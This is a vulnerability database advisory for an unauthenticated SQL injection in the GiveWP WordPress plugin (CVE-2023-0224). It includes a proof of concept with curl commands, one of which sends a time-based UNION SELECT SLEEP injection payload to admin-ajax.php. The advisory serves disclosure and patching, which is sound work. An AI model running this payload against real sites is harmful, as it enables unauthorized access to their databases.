WordPress Plugin Vulnerabilities

GiveWP < 2.24.1 - Unauthenticated SQLi

Description

The plugin does not properly escape user input before it reaches SQL queries, which could let unauthenticated attackers perform SQL Injection attacks

Proof of Concept

1) Create a post/page that contains the "Donor Wall" block.

2) Using the default donation form, send a test donation

3) In a terminal, edit and run the following command, and copy the nonce it gives you
   curl -s --url 'http://vulnerable-site.tld/donor-wall-post-we-created-earlier/' | grep -o 'data-nonce="[a-f0-9]*"'

4) Still in the terminal, edit and run the following command:
   curl 'http://vulnerable-site.tld/wp-admin/admin-ajax.php' -X POST --data-raw 'action=give_get_donor_comments&nonce=c734a76f44&data=form_id%3D%27%29%20UNION%20%28SELECT%20SLEEP%285%29%29%23'

Other affected parameters: ids (fixed in 2.24.0), donors_per_page (fixed in 2.24.1)

Affects Plugins

Plugin icon
give
Fixed in 2.24.1

References

CVE
CVE-2023-0224
URL
https://givewp.com/core-2-24-0-vulnerability-patched/

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
d8da539d-0a1b-46ef-b48d-710c59cf68e1

Timeline

Publicly Published
2023-01-19 (about 1 years ago)
Added
2023-01-20 (about 1 years ago)
Last Updated
2023-01-20 (about 1 years ago)

Other

Published
Title
Published
2018-05-27
Title
Membermouse < 2.2.9 - Blind SQL Injection
Published
2024-03-28
Title
WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting <= 1.12.9 - Authenticated (Subscriber+) SQL Injection
Published
2014-08-01
Title
Mingle Forum <= 1.0.31 - SQL Injection
Published
2023-01-12
Title
Simple Membership WP < 1.8 - Admin+ SQLi
Published
2014-08-01
Title
IndiaNIC FAQs Manager 1.0 - Blind SQL Injection